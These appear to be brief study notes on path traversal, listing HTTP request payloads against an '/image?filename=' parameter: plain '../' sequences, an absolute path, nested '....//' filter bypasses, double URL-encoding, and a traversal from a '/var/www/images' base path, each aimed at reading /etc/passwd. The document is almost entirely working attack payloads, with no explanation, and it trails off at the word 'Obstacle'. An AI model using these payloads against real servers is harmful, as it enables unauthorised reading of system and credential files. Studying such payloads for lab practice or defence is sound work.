Path Traversal Notes

Path Traversal Notes

Normal

GET /image?filename=../../../etc/passwd

GET /image?filename=/etc/passwd

Nested

GET /image?filename=....//....//....//etc/passwd

Double URL-Encode

GET /image?filename=%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252Fpasswd 

/var/www

GET /image?filename=/var/www/images/../../../etc/passwd

Obstacle